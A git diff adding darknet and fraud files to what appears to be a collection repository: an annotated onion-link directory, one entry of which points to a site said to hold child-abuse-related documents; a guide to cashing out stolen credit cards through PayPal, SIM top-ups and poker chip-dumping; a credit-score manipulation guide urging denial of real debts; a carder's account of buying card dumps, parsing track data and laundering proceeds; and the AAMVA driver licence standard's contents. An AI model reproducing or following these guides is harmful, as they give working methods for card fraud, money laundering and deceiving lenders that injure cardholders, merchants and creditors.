+http://gkf352hyigqoan2g.onion/ Extra Another extra category site, which also only have status on webpage, and any other information are not available there.. If you know anything about this site please share with us, we will update your information for my site readers.
+
+http://roewfyjjhvmv6zbu.onion/ Extra I dont know, how we can use this type offer information, I am saying this because when I visited this site, then I saw only some graph, which shows some coordinate and points.
+
+http://mqqrfjmfu2i73bjq.onion/ Extra Tor Kittenz: another anonymous site which doesnt driving any extra information, when I visited this site, I saw one cat image and after image website also have on link.
+
+http://dioq2yg3l5ptgpge.onion/index.html Extra TheCthulhu Lurks Here: another deep web site which not providing sufficient information about, what is offering? and what you can do with this site? thats why I also put this site into extra category. but I think this site admin name is Cthulhu Lurks, If you want to contact to Cthulhu Lurks then you can try bellow contact us page link.
+
+http://njto3uretienojic.onion/ Extra Same as upper given deep web link, this site also bot offering information, but only have one image, and image have biohazard symbol.
+
+http://xpgylzydxykgdqyg.onion/ Extra List.Riseupp.net: Do you looking any directory, which provides you all category related to journals and thesis. If you are looking such type dark web links, then visit here.
+
+http://secushare.cheettyiapsyciew.onion/ Extra/Social SecureShare: According to this dark web links Imagine Facebook, Whatsapp, Gmail and Skype rolled into one, without the centralized surveillance and control. Crazy? Well, it hasnt been try before, at least not our way. So lets give it a try. If you want to know more about this project then you can visit secure share deep web links.
+
+http://pilletubnarawosh.onion/ Extra Private Computer System: This site have some warning information into a webpage. Do you want to get more about this site then you may visit here?
+
+http://rjzdqt4z3z3xo73h.onion/ Extra How will you tell the world: This deep web site have some graphic presentation, like circle rectangle, dots and many more, if you know hoe to use that then you can try to visit this hidden wiki link.
+
+http://dtt6tdtgroj63iud.onion/ Extra Deep web in a Nutshell: For site testing process, I found when I click on given links then every time site will be open on the duplicate page, and domain name should be same which is primary domain, thats why dont visit this deep web sites offer links.
+
+http://allyourkotatxek4.onion/ Extra/Porn Another site which has only animated image and one soundtrack which automatically plays we you will visit this dark web links.
+
+http://lolicore75rq3tm5.onion/ Extra Lolicorn: I think this site also offer music-related service, but I dont know how to use this site because site also has some technical function related commands like ssh access, SFTP, rsync and more.
+
+http://gac5e64yd3rsdk5n.onion/ Extra OTR.im: This website works like a community but only for developers, If you have any open source project and looking some contributor or you also want to contribute in another open source project then this site is right place for you.
+
+http://bgyar6b644c33joc.onion/ Extra Bombagyar! : This is non-English site, I you know anything about this site and want to share your experience here please leave your comment.
+
+http://data44v2jfxk46ma.onion/ Extra Dataleaks: This is unique category website, according to data leaks, If you have dark web market or you want to get high traffic on your website then you can buy his subscription and you can easily can drive huge amount of real users traffic on your deep web sites.
+
+http://dnjobs7e4z3zt7wa.onion/ Extra/Job Darknet Jobs: This deep web links providing service for job consulting, If you are looking jobs into anonymous environment then this website can help you, here you also can post your jobs, for which you want to hire someone. Note: For Payment, you can use BTC.
+
+http://torsniffrqvvkv4x.onion/ Extra TorSniff: Many time you need to check any deep web sites status, means you want to check site is working or not. Now you can check any deep web sites status by the help of TorSniff. Only you need copy your website URL and put into Page URI/URL section, and press check button then holla now result on front of your eyes.
+
+http://54lnbzjo6xlr4f4j.onion/ Extra Tor Project: Do you want to download tor software and want to access Tor Project website into anonymous environment, then this link can help you. This is the link of Tor Project official website which is also hosted on .onion extension web environment.
+
+http://kmltuigipr23dk3g.onion/ Extra Torperf measurements of Tor hidden service: I dont know what type information offering by this deep web sites, but when I visited this site then I found one graph which have some indication, hope you can find something informative here.
+
+http://mrlevrrir47hvei5.onion/ Extra MrLevRocks: Self-hosted site which admin name is MrLevRocks, he is offering here his project information and his gallery collections. This deep web site also has blog section where you can see some blog post.
+
+Hosting Service Deep Web Sites Links | Dark Web Links
+
+Do you want to make your own deep web sites or darknet marketplace and looking some affordable hosting service deep web links for hosting your darknet websites then checkout bellow given hosting deep web links, and buy any efficient plan according to your requirements. I have shared some best anonymous hosting services links, but before buying, make sure to check review of particular hosting service.
+
+Note: I am not recommending you given deep web links, but before buying hosting service please discuss with hosting service support and also check these service provider reviews. I am only adding these deep web sites links/dark web links here for education purpose.You are accessing any of deep web links is totally on your risk, but I am recommending you here before visiting any darknet links make sure you have run NordVPN.
+
+Recommended: For very best security and complete anonymity always use NordVPN Tor Over Server + Tor Browser.You are not safe if you are accessing these deep web links without VPN software.
+
+http://2222zui5d3psp4v5.onion Hosting Kowloon Hosting Services: Do you want to make your own the hidden wiki link and looking hosting service then you can try Kowloon, Here you can find multiple plans and can select anyone which is best for you.
+
+http://prometh5th5t5rfd.onion/ Hosting Prometheus Hiddn Service: This Deep web sites offering hosting service, you can buy here VPS and Dedicated hosting and all plans having lot of features, If you want to buy hosting then you can try this hosting service.
+
+http://hostiysldm5iocpp.onion/ Hosting Deep Web Hosting: same as other hosting you can host your website with Deep web hosting.
+
+http://vilasamxj3nyexl2.onion/ Hosting Vilasam Hosting Service: This is another deep web hosting alternative, but mostly time I saw this hosting website down. You can try your luck.
+
+http://chchchiasaeljqgs.onion/ Hosting Chan Hosting: Here you can buy hosting service according to your requirement. This onion site having some great plans. Why are you waiting, choose best suits plan and create your own deep web link.
+NordVPN 2
+
+http://bitservepd6bbxtq.onion/ Hosting BitServer: If you are looking more hosting alternative then BitServer also can prove helpful for you, here you also can buy hosting for your deep web sites.
+
+http://torhost3p7quiikq.onion/ Hosting Tor Hosting: Are you looking some best hosting provider for your .onion site then check out this deep web site, here you can find best hosting packages which you can select any one according to your requirement.
+
+http://shv34p5cckiljkww.onion/ Hosting Hidden Hosting Service: this Deep web sites also offering .onion domain hosting, you can also try this site. Normal Plan offering 20 GB storage, Unlimited Bandwidth, 10+ free onion domains and etc.
+
+http://mwl3znktk7mqogdv.onion/ Hosting Creating Tor Place: If you looking some other hosting alternative then This deep website can help you,
+
+http://d33pzjppzy7d37r2.onion/ Hosting Deep Hosting is trusted deep web hosting service link, here you can find VPS, Dedicated server and VPN service into very cheap price.
+
+http://mgibojrlzdfoajbn.onion/index.php Hosting/Service TorShop: Do you want to make your own deep web store or dark web store then check out this hidden wiki url.
+
+if you know about any best hosting service deep web links, feel free to share with me, I will be happy to add that deep web links hosting service into this deep web links list.
+
+Deep Web Books Sites Links
+
+Do you love books and looking some great resources from deep web then you can checkout this section, inside this category, I am sharing all active and self-tested links. But some time you can face link down problem then you can leave these type deep web links, and also you can report to us by the help of comment section.
+
+Note: You already know without tor browser, you cant access the deep web sites. But many times, I saw some given links might offer spam contents thats why for your privacy security, you should use NordVPN premium services.
+
+Note: Before access bellow given links, start your VPN software and connect any high-speed server then run tor browsers. If you want to know, how to access the deep web check complete guide post.
+
+http://mx7rwxcountermqh.onion/ Books Bibliomaniac knows your onions: This deep web sites offer onion links server, and all links are serving books, If you love books and always interested into reading books then here you can find some great content. When I visit this dep web sites then I saw, site have more than 50+ active deep web links.
+
+http://52wdeibt3ivmcapq.onion/ Books Liberated books and papers: Do you like reading books and looking some deep web servers where you can find research related documents then today I found one links which offer some great books collection and which you can download into your computer by the help of given hyper links.
+
+http://akmb7t5w56jcfgwf.onion/ Books Tor Service: Are you tech savvy guys and want to read some technical ebooks, for example, books related to programming (HTML, JAVA, Java Script, CGI, ActiveX, Apache Server, etc.). Mostly books from Macmillan Computer Publishing. This deep web links also offer some other stuff which is not browsable at a time when I visited this site. External category is penisology, minet, nude shoots, home porn.
+
+http://clivl6rf3vft7ihw.onion/ Books Non-English: I dont know anything about this deep web sites, because this is not written in the English language, hope you can find your required stuff on this site.
+
+http://clockwise3rldkgu.onion/ Books Libraries: According to this deep web links, here you can find some good books related content, and also you can download books and can read easily but when I click on given hyperlink then I saw windows same as website http://mx7rwxcountermqh.onion/
+
+http://fb2lib3argrtulnw.onion/ Books FB2 Lib: Today are you looking some deep web books websites for reading some interesting stuff on hidden internet. Now I have this deep web links which have more than ten language supported books, available books language is Russian, Italian, English, Germany, etc. Total available books 342053, which is huge. Hope you will enjoy something interested here.
+
+http://flibustahezeous3.onion/ Books This deep web sites is look like as another deep web forums, But this forum have some active threads If you are able to understand what is offering? And how to access the offer services then share with us.
+
+http://hackerw6dcplg3ej.onion/ Books Hackerplace: I love this deep web links because this site has big amount of data related to magazine, books, torrents, shops, hacking books and some active dark web links directory. But here I found one problem, If you visit this deep web sites into Tor browser then every time when you click on download button then every links automatically open in Bitly. Which is very irritating and risky for security reasons.
+
+http://k2r5psouiawfu6jy.onion/ Books Index of/: This deep web sites offer directory view but having a lot of content related to videos, books, software, games, music and much more. If you are still finding tech related ebooks then, visit this site and download any required ebooks.
+
+http://papyrefb2tdk6czd.onion/ Books LA RENACIDA BIBLIOTECA DE PAPYREFB2: This site also has big amount of ebook. Available ebooks no are 28086, which is very big, one more thing which I like on this dark web sites, you can find your required book by the help of character filter option. Here only you need to click on relevant character then select your required ebook.
+
+http://kpynyvym6xqi7wz2.onion/files.html Books/Documents ParaZite is a directory, which has a huge number of secret papers and files. By the help of given links, you can access these files and Documents. Main Categories (Porn, Documentaries, History, Hacking, Weapon, Adult, etc.), This site has some illegal stuff like CP related document, Drugs related research papers and much more. Before access ParaZite deep web links, make sure you have double layer security (NordVPN+Tor Browser).
+NordVPN 2
+
+http://xfmro77i3lixucja.onion/ Books Imperial Library of Trantor is the biggest place for books; here you can find all major categories books, and if you want to find any specific category ebook, then you can easily filter by the help of tag system which you can see on the homepage. This Deep Web sites has more than 101640 Books in digital format and library size still growing day to day, hope here you can find your required books. Some available popular category which mostly people like here Fiction, Science, Mystery, Action & Adventure, Horror, Suspense, Thriller, Paranormal, General, Crime, Thrillers and so on.
+
+http://bookssutzsay4so3.onion/cat/ Books Mobi Library: Still looking book deep web sites alternative then here is another one, which also offers big amount books library. This site has more than 10000+ books, which you filter according to works or starting character.
+
+http://wis45idjhhbgemez.onion/ Books Calibre Library: This dark web links also offer books library, if you are still searching book for reading then hope this site can help you.
+
+http://3cvpkfx4gdnkcduj.onion Books Non English: Do you want to download some ebook from deep web links. I have one dark web links which offer big ebook database, database size is 159.457 GB, here you can search ebook by the help of text, suppose you are looking ebooks related to sex then put your text into search box then result will be front of you.
+
+http://3cpleimu2getp5q7.onion/ Books Strategic Intelligence Network: I love this site because here you alco can find big amount of all type books related to tech, weapons, security, engineering and much more, and website is browsable just like as directory(FTP) structure. For Directory library access, you can try http://3cpleimu2getp5q7.onion/library/ link.
+
+https://www.cs.tau.ac.il/~tromer/ecdh/ Books/Study/journals ECDH Key-Extraction via Low-Bandwidth Electromagnetic Attacks on PCs: This site offer research paper about Low-Bandwidth Electromagnetic Attacks on PCs, If you want to get lot more about this technique then you can visit this deep web sites.
+
+http://ibgk7stvp6bov6x6.onion/ Books Anonlib is a sites related to most religious books like The Koran, The Bible, Panchatantra and lot of others. If you want to access these books into hidden internet, then you can visit this site.
+
+http://castorz2lijmrc5f.onion/ Books/Study/journals Biblioteca Castor: This is the big books library. I love this library because one the website screen you can see some ebook pictures, and all books which are shown on display all are very popular. This site also offers multilingual ebooks, here you find some other language books like Russian, Dutch, English and etc.
+
+http://dembtxtlnu2cospb.onion/index.html Books/Adult/Stories Dark & Extream Boy Stories: Do you like Adult stories and finding some great Tor onion links then this deep web sites can provide you great amount of adult stories, here you can choose stories according to authors. Hope you will enjoy these stories.
+
+http://h2am5w5ufhvdifrs.onion/ Books/Study/journals Cryptome: Do you want to get information about some true gernals related to government agencies, check out this hidden internet site, here you also can download these generals and can read locally into your computer.
+
+http://v3bpt2x7iuz3gr2n.onion/ Books Humen Iteration: This deep web sites offer some experts document, if you are looking some research document and want to know more about these documents then you can try this deep web links.
+
+This deep web links list is not like other deep web links list. I have checked every the hidden wiki url frist before adding into the list of deep web links. All hidden wiki onion link are working.
+
+Keep visiting to get more info about deep web dark web, dark web links, deep web sites, the hidden wiki url, deep web websites, tor hidden wiki, dark web wiki, tor dark web, links de la deep web, tor directory, hidden wiki link 2016, links onion sites, sites da deep web, etc.
diff --git a/2VPNS_txt.md b/2VPNS_txt.md
new file mode 100644
index 0000000..7deee5b
--- /dev/null
+++ b/2VPNS_txt.md
@@ -0,0 +1,9 @@
+# 2VPNS
+
+
+---
+
+VPN Gate:
+https://mega.nz/#!wlp3nQDT!t5ujPcC7g9MompVNAVCEtq_7azvIJyGs98RgiG7m-XI
+BETTERNETVPN
+https://www.betternet.co/
diff --git a/3 Ways_To_Cash_Out bitcoin_pdf.md b/3 Ways_To_Cash_Out bitcoin_pdf.md
new file mode 100644
index 0000000..8cd0572
--- /dev/null
+++ b/3 Ways_To_Cash_Out bitcoin_pdf.md
@@ -0,0 +1,45 @@
+# 3 Ways To Cash Out bitcoin
+
+
+---
+
+Way N.1: PayPal
+what you need:
+IBAN/ANON Card ± you can buy one cheap from: Tobacco2012
+1:Set up a real PP account using your real anon. It is easy to do but if you don't know
+how you can ask Tobacco2012 to sell you a guide within his real anon CC.
+2: Wait for validation
+3: Get an anonymous SIM card
+4: Register yourself to liqpay
+5: From PP account create a donation button
+6: Using stolen CC's deposit some money using the donation button. (my advice is not
+much from each card, around £20/30 per card is good)
+7: Now buy bitcoins using the PP card by liqpay
+8: Transfer your money to your BTC address ;)
+This way is tested and 100% working.
+Way N.2: Sim Card
+what you need:
+A bunch of SIM cards
+1: Check if your SIM card is refillable online. If so then go on.
+2: Now fill your SIM cards using CC's. Its better to do different refills of low amounts.
+3: Now subscribe a wallet on blockchain.info (use tor!!)
+4: Now make an instant deposit by telephone:
+1: select country.
+2: select big amount.
+3: select payphone way.
+4: call and wait.
+Good! You now have your BTC in your wallet, you can easily transfer to your address and spend
+them. I tried this using a Polish SIM card. This way has high fees but has highest success rate.
+Way N.3: Poker
+To do this you need an initial investment of 2BTC.
+1: Go to https://www.switchpoker.com/en and register an a REAL account for you.
+2: Refill that account using 2 BTC.
+3: When asked use REAL information of yourself.
+4: Now register a second FAKE account using CC information (use tor!)
+5: Refill fake account with CC information.
+6: Now, using tor and you normal browser, play the 2 accounts against each other and
+win on real account.
+7: Do some real play to avoid suspicion on real account.
+8: After couple of days withdraw your winnings.
+9: You have 50% chance of being asked for ID when you withdraw, send it without
+problem as you won this money legally ;)
diff --git a/7 Days Rapid Rescore Strategy_2016_pdf.md b/7 Days Rapid Rescore Strategy_2016_pdf.md
new file mode 100644
index 0000000..3d2e6c0
--- /dev/null
+++ b/7 Days Rapid Rescore Strategy_2016_pdf.md
@@ -0,0 +1,65 @@
+# 7 Days Rapid Rescore Strategy 2016
+
+
+---
+
+DELETE ALL NEGATIVE ITEMS IN 7 DAYS
+The picture above is of the Credit Assure credit simulator that shows you precisely the amount
+your credit score will rise after completing a RAPID RESCORE. But more about this in a minute.
+Let's get started!
+W H A T I S A RA P I D R E S C O R E ?
+A rapid rescore is the ability to provide documentation or request documentation to the 3 credit
+bureaus to get them to update your information quickly. Many of these scores can be updated in as
+little as 72 HOURS!
+Yes that's right 3 days!!!!
+But how does someone do this? How can I update my score that quickly? How can I challenge
+the 3 credit bureaus to verify my negative accounts that quickly?
+Well I'm glad you asked....
+
+L O C A L I N D E P E N D E N T M O R G A G E L O A N O F F I C E R S
+Contact local independent mortgage loan officers. NOT A BANK. You are looking for a few
+people who run their own 2-3 person, small shops. You are looking for a loan officer who knows about
+rapid rescore and will do a rapid rescore for you.
+You will need to explain you are looking to purchase a home in the near future. Who know you
+might actually want to purchase a home and need a loan, but that is not important right this second.
+Your point is to get the loan officer to pull your credit and do a rapid rescore.
+Ask this potential loan officer if his credit pulling agency offers a rapid rescore. Most everyone
+does rapid rescore these days and most have the Credit Assure credit simulator (Picture Above).
+Explain to them you will require a few rapid rescores in advance to increase your credit scores
+to get the best rate on a loan because of some old delinquent accounts and old errors. MAKE SURE
+THEY WILL HELP YOU WITH A RAPID RESCORE.
+Give the loan officer your vital information: Name, Phone #, Address, Social Security Number,
+Date of Birth, etc so he can pull your credit report. This credit report is actually pretty cool. Mortgage
+credit reports are special and show the FULL ACCOUNT NUMBERS and all data in the 3 Credit
+Bureaus. This is known as your Tri-Merge Credit Report. Cool huh? Check it out below...
+
+C R E D I T S I M U L A T O R
+Study your credit simulator thoroughly and decide what items will increase your score the most
+quickly. Use this above 7 day rapid rescore system for the really big ones and the Section 609 letters
+for the next biggest. Once you know what negative items you will remove or that you have paid and
+are just sitting there request the loan officer (or you can do it yourself) to get the collection agency or
+creditor to fax or mail you a letter on their letterhead proving the account does not exist, is paid, or
+should be deleted BECAUSE THEY CAN'T VERIFY IT WITH PROOF THE DEBT IS YOURS.
+They can't prove the debt is yours – these mistakes on your credit report are what are holding
+you back from getting a home loan and explain to loan officer that these negative accounts are
+“ERRORS”. He will be able to walk you through what to do next.
+When the loan officer calls the collection company or creditor they ask to verify the account
+number. Then they ask to verify the account status. The status can be an error, paid, or deleted. We
+always push for deleted. Never admit the negative account is yours. Either it is an error and must be
+deleted or it's paid in full and should come off.
+S A M P L E L E T T E R H E A D
+Here is a sample letterhead you would get proving status of canceled, deleted or paid accounts
+
+Once the negative item is verified as paid in full, not yours, or reported as an error, the update to
+your credit report is almost instant.
+N O T E S
+Using a mortgage loan officer in this way may not be very ethical however if you are planning
+to buy a home this a smart way to do it and you can use the loan officer. He or she will get that
+commission if you do decide to buy a home in the future and use that loan officer. If you are not
+planning to purchase a home you can PAY the loan officer for the rapid rescore.
+You can also pay http:// www.rapidrescorecredit.com
+They should charge you $100 per account. They might try to sell you their credit repair
+program. Just try to get Rapid Rescore Only.
+With the dispute letters and the ability to rapid rescore you have enormous power to fix your credit and
+your life.
+I wish you the best!
diff --git a/A Carder_s First Experience_pdf.md b/A Carder_s First Experience_pdf.md
new file mode 100644
index 0000000..b9a50d1
--- /dev/null
+++ b/A Carder_s First Experience_pdf.md
@@ -0,0 +1,87 @@
+# A Carder s First Experience
+
+
+---
+
+We do not support carding! This is for educational purposes only – and reflect the author’s
+own experience and views only.
+At the time of this story, I was new to carding. Saying that I was “new” is a bit of an
+understatement. I had never used any Darknet markets, and I had barely any experience
+with Bitcoin. I had a lot to learn. This was my experience.
+There are currently few major carding forums such as – Tor Carding Forums (TCF) and
+Rescator for example. Since Tor Carding Forums had a fee for registration, I decided to use
+Rescator. The website requires an account to access any listings or to make purchases, but
+it does not require any payment for registration.
+There are two things that are unique about Rescator: first, it is centralized. As the rumor
+goes, Rescator was a reputable user from a now-defunct Russian forum. After this forum
+was infiltrated by law enforcement, he decided to open his own dedicated shop. Many of the
+recent security breaches, including Target and J.P. Morgan, can be traced back to a small
+group of people who include Rescator. Second, there is no escrow system. Once you
+release funds, there is very little you can dispute. The site’s only dispute resolution is in the
+form of tickets. I had to put a lot of trust in a single person.
+There is also some terminology that is pretty exclusively used on carding forums. “Dumps”
+are the collections of data that are being sold. These are exactly what they sound like –
+disorganized dumps of all data that was collected. A “base” is a collection of dumps that
+were all skimmed from the same source. The data from the Target hack would be a base,
+while the data from the Home Depot hack would be another base. The names of these
+bases vary, ranging from names like, “Ronald Reagan” to “Beaver Cage”. The amount of
+data that you can expect to still be usable and valid is called the “validity rate”.
+In order to purchase a dump, I had to transfer money into an on-site account. This is where
+Bitcoin came into the picture. I decided not to tumble my Bitcoins. Many people advocate
+that you must tumble your Bitcoins. The issue, however, is that tumbling Bitcoins does not
+make them impossible to trace – it just makes them difficult to trace. This is what we call,
+“security through obscurity”.
+I decided that, to be safe, I had to make my Bitcoins impossible to trace. Here was my plan:
+All Bitcoin transactions are publicly recorded on the blockchain. As long as you are trading
+on the blockchain, all transactions are connected. Therefore, I had to break the chain of
+transactions. To do this, I used a normal Bitcoin exchange.
+I converted my Bitcoin to Litecoin, then back into Bitcoin.
+
+The act of purchasing was fairly straightforward. The website itself was very user-friendly.
+There was a basic filter that could be used to sort by base, country of origin, type of card,
+among other criteria. When I decided on the card information I wanted to purchase, I added
+it to my cart. At this point, in order to release funds and receive the dump, I simply clicked a
+“purchase” button.
+From the time a base is released, the validity rate will gradually decrease. After a security
+breach is discovered, companies and account holders begin to close accounts, and the data
+quickly becomes useless. Therefore, I chose a recent base: American Sanctions,
+information collected during the recent Home Depot breach.
+
+This is what I got once I received my order. This, at first, was a bit confusing.
+Here’s how card technology works: There are two to three tracks on the magnetic strip of a
+credit or debit card. Track 3 is sometimes not even present on cards, and most major
+networks only use tracks 1 and 2.
+This is the format for Track 1: account number^Lastname/Firstname^expiration
+date(YY/MM)::bank key(3 numbers)::discretionary data or security key(in this case it was a
+CVC code – 3 numbers)::Longitudinal Redundancy Check.
+This is the format for Track 2:
+account number=expiration date(YY/MM)::service code(3 numbers)::discretionary data or
+security key (3 numbers)::Longitudinal Redundancy Check
+A lot of the information from Track 1 is repeated on Track 2.
+Now we can make my example meaningful:
+Lets divide Track 1:
+4631588xxxxx//,.//1601//101//163//03100495000000
+Our primary account number is: 4631588xxxxx
+Our account holder is:
+Our Expiration date is: 01/16
+Our service code is: 101
+Our CVC code is: 163
+Once I had organized this information, it became a matter of cashing out the card.
+The difficulty of actually using this information is figuring out how to use it anonymously. I
+decided that once again, I would turn to Bitcoin. There are several things a website asks
+you for when you use a debit or credit card: the primary account number, the expiration
+date, and the security (CVC) code.
+Since all of this was included in the dump, I could use the card online without any problems.
+I decided to purchase gift cards, which I would then sell for Bitcoins. After doing my Bitcoin
+> Litecoin > Bitcoin tumbling scheme mentioned earlier, I could deposit these into my wallet.
+However, I never got that far. My plan would have been successful…had the card holder’s
+account not been closed.
+
+Overall, my experience was very positive. At first, I was just happy that I hadn’t gotten scammed;
+and after banging my head over my desk a few times, I ended up not being too upset over the
+card’s failure. After all, if I had purchased a card with an option for a refund, I would have been
+successful. Using the information, while an extensive process, was definitely doable. It worked very
+much like any market, with many helpful and honest members.. The people involved were not just
+criminals looking for easy money; they were interested in the technology and were more than
+willing to help me. The carding community was just as diverse as any community, and I discovered it
+was just as tight knit.
diff --git a/AAMVA National Standard for the Driver License Identification Card-2000_pdf.md b/AAMVA National Standard for the Driver License Identification Card-2000_pdf.md
new file mode 100644
index 0000000..1f53326
--- /dev/null
+++ b/AAMVA National Standard for the Driver License Identification Card-2000_pdf.md
@@ -0,0 +1,3275 @@
+# AAMVA National Standard for the Driver License Identification Card-2000
+
+
+---
+
+AAMVA
+2000-06-30
+AAMVA National Standard for the
+Driver License/Identification Card
+AAMVA DL/ID-2000
+American Association of
+Motor Vehicle
+Administrators
+
+This document was produced by AAMVAnet, Inc. AAMVAnet is a division of the American
+Association of Motor Vehicle Administrators (AAMVA).
+No part of this document may be reproduced or transmitted in any form or by any means,
+electronic or mechanical, including photocopying, recording, or information storage or retrieval
+systems, for any purpose other than the intended use by AAMVAnet, Inc., without the express
+written permission of AAMVAnet, Inc.
+© 2000 AAMVA/AAMVAnet. All rights reserved.
+
+Contents
+1 Scope...............................................................................................................................................1
+2 Conformance...................................................................................................................................1
+3 Normative reference(s)...................................................................................................................1
+4 Term(s) and definition(s)................................................................................................................3
+5 Physical characteristics and card technologies...........................................................................5
+5.1 Physical characteristics..................................................................................................................5
+5.2 Card technologies...........................................................................................................................5
+5.3 Durability of card structure............................................................................................................5
+6 Data elements..................................................................................................................................5
+6.1 Description of table headings........................................................................................................5
+6.1.1 Reference Number..........................................................................................................................5
+6.1.2 Data element/label...........................................................................................................................6
+6.1.3 Usage...............................................................................................................................................6
+6.1.4 Definition.........................................................................................................................................6
+6.1.5 Field length and type......................................................................................................................6
+6.1.6 Address requirement......................................................................................................................6
+6.2 Required data elements..................................................................................................................7
+Table 1 — Required data elements.....................................................................................................................7
+6.3 Optional data elements...................................................................................................................8
+Table 2 — Optional data elements......................................................................................................................8
+6.4 Format conventions......................................................................................................................11
+6.4.1 Character set.................................................................................................................................11
+6.4.2 Format of dates.............................................................................................................................11
+7 Physical security...........................................................................................................................12
+7.1 Definitions.....................................................................................................................................12
+7.1.1 Covert............................................................................................................................................12
+i
+
+7.1.2 Overt..............................................................................................................................................12
+7.1.3 First line inspection......................................................................................................................12
+7.1.4 Second line inspection.................................................................................................................12
+7.1.5 Third line inspection.....................................................................................................................12
+7.2 Physical security requirement......................................................................................................12
+8 Encryption.....................................................................................................................................12
+Table 3 — Minimum Non-encrypted data elements.........................................................................................13
+Annex A (normative) Mapping of driver license/identification card info to magnetic stripe cards............15
+Introduction.......................................................................................................................................................15
+A.1 Conformance.................................................................................................................................15
+A.2 Card characteristics......................................................................................................................15
+A.3 Coded character set......................................................................................................................15
+Table A.1 — Coded character set for 5 bit numeric.........................................................................................15
+Table A.2 — Coded character set for 7 bit alphanumeric................................................................................16
+A. 4 Information content and format...................................................................................................16
+A.4.1 Track 1...........................................................................................................................................17
+Table A.3 — Track 1 information content and format......................................................................................17
+A.4.2 Track 2...........................................................................................................................................18
+Table A.4 — Track 2 information content and format......................................................................................18
+A.4.3 Track 3...........................................................................................................................................19
+Table A.5 — Track 3 information content and format......................................................................................19
+A.5 Encoding specifications...............................................................................................................20
+A.6 Error detection..............................................................................................................................20
+Annex B (normative) Mapping driver license/identification card info to integrated circuit(s) cards (ICC) 21
+Introduction.......................................................................................................................................................21
+B.2 Physical characteristics................................................................................................................22
+B.3 Location and dimensions of coupling areas...............................................................................22
+B.4 Electronic signals.........................................................................................................................22
+B.5 Transmission protocols and answer to reset..............................................................................22
+ii
+
+B.5.1. Transmission protocols...............................................................................................................22
+B.5.2. Answer to reset.............................................................................................................................22
+B.6 Application selection....................................................................................................................22
+B.7 File structure.................................................................................................................................22
+B.8 Command set................................................................................................................................23
+B.9 File contents..................................................................................................................................24
+B.9.1. EF (Issuer Information) SFI ‘01’.............................................................................................24
+ISSUER
+B.9.2. EF (Driver License data) SFI ‘02’................................................................................................25
+DL
+B.9.2.1 Record 1 – mandatory data elements..........................................................................................26
+B.9.2.2 Record 2 – personal characteristics............................................................................................27
+B.9.2.3 Record 3 – permit data elements, residence address and mailing address..............................28
+B.9.2.4 Record 4 – “AKA” data elements.................................................................................................29
+B.9.3 EF (Magnetic Stripe Information) SFI ‘03’................................................................................29
+MAG
+B.9.4 EF (Digitized Portrait Image) SFI ‘04’.......................................................................................30
+POR
+B.9.5 EF (Digitized Handwritten Signature Image) SFI ‘05’...............................................................30
+SIG
+B.10 Security.........................................................................................................................................31
+B.11 Data element tags.........................................................................................................................32
+Annex C (normative) Finger imaging.............................................................................................................35
+Introduction.......................................................................................................................................................35
+C.1 Conformance.................................................................................................................................35
+C.2 Application Definitions.................................................................................................................35
+C.2.1 Verification....................................................................................................................................35
+C.2.2 Search............................................................................................................................................35
+C.2.3 Core...............................................................................................................................................35
+C.3 Finger Selection............................................................................................................................35
+Figure C.1 — Finger Selection..........................................................................................................................36
+C.4 Image Quality................................................................................................................................36
+C.4.1 Finger Image Collection Device...................................................................................................36
+C.4.2 Finger Image Collection Result....................................................................................................36
+iii
+
+C.5 Compression.................................................................................................................................36
+C.6 Data Format...................................................................................................................................37
+C.7 Minutiae Extraction Introduction.................................................................................................37
+C.8 External Standards Referenced...................................................................................................37
+C.9 Definitions.....................................................................................................................................37
+C.10 Minutiae Description....................................................................................................................38
+C.10.1 Principle........................................................................................................................................38
+C.10.2 Minutia Type..................................................................................................................................38
+C.10.3 Minutia Location...........................................................................................................................38
+C.10.3.1 Coordinate System.......................................................................................................................38
+C.10.3.2 Minutia Placement on a Ridge Ending........................................................................................38
+C.10.3.3 Minutia Placement on a Ridge Bifurcation..................................................................................39
+C.10.3.4 Minutia Placement on Other Minutiae Types..............................................................................39
+C.10.4 Minutia Direction..........................................................................................................................39
+C.10.4.1 Angle Conventions.......................................................................................................................39
+C.10.4.2 Angle of a Ridge Ending..............................................................................................................39
+C.10.4.3 Angle of a Ridge Bifurcation........................................................................................................39
+Figure C.2 - Minutia Location............................................................................................................................40
+C.11 Finger Minutiae Record Format...................................................................................................41
+C.11.1 Record Header..............................................................................................................................41
+C.11.1.1 Format Identifier...........................................................................................................................41
+C.11.1.2 Version Number............................................................................................................................41
+C.11.1.3 Length of Record..........................................................................................................................41
+C.11.1.4 System Vendor ID.........................................................................................................................42
+C.11.1.5 Feature Extraction Software ID....................................................................................................42
+C.11.1.6 Scanner ID.....................................................................................................................................42
+C.11.1.7 Size of Scanned Image in X direction..........................................................................................42
+C.11.1.8 Size of Scanned Image in Y direction..........................................................................................42
+C.11.1.9 Scan Rate in X direction...............................................................................................................42
+C.11.1.10 Scan Rate in Y direction...............................................................................................................42
+iv
+
+C.11.1.11 Number Of Fingers.......................................................................................................................42
+C.11.1.12 Reserved Byte...............................................................................................................................42
+C.11.2 Single Finger Record Format.......................................................................................................42
+C.11.2.1 Finger Header...............................................................................................................................42
+C.11.2.1.1 Finger Position.............................................................................................................................43
+Table C.1 - Finger Position codes...................................................................................................................43
+C.11.2.1.2 Impression Type...........................................................................................................................43
+Table C.2 - Impression Type codes................................................................................................................43
+C.11.2.1.3 Finger Quality...............................................................................................................................44
+C.11.2.1.4 Number of Minutiae......................................................................................................................44
+C.11.2.2 Finger Minutiae Data....................................................................................................................44
+C.11.2.2.1 Minutiae Type................................................................................................................................44
+C.11.2.2.2 Minutiae Position..........................................................................................................................44
+C.11.2.2.3 Minutiae Angle..............................................................................................................................44
+C.11.2.2.4 Minutiae Quality............................................................................................................................44
+C.11.3 Proprietary Data............................................................................................................................44
+C.11.3.1 Type Identification Code...............................................................................................................44
+C.11.3.2 Length of Data...............................................................................................................................45
+C.11.3.3 Private Data....................................................................................................................................45
+Table C.3 - Minutia Record Format Summary..................................................................................................46
+C.12 Record Format Diagrams..............................................................................................................47
+C.12.1 Overall Record Format..................................................................................................................47
+C.12.2 Record Header...............................................................................................................................47
+C.12.3 Single Finger Minutia Record.......................................................................................................47
+C.12.4 Finger Minutiae Data.....................................................................................................................48
+C.12.5 Private (Proprietary) Data..............................................................................................................48
+C.13 Interoperable Matcher Performance (Informative).......................................................................49
+Figure C.3 - Interoperability Concept...............................................................................................................49
+C.14 Compliance (Informative)..............................................................................................................50
+C.14.1 Record format compliance............................................................................................................50
+v
+
+C.14.2 Finger Minutiae Extraction............................................................................................................50
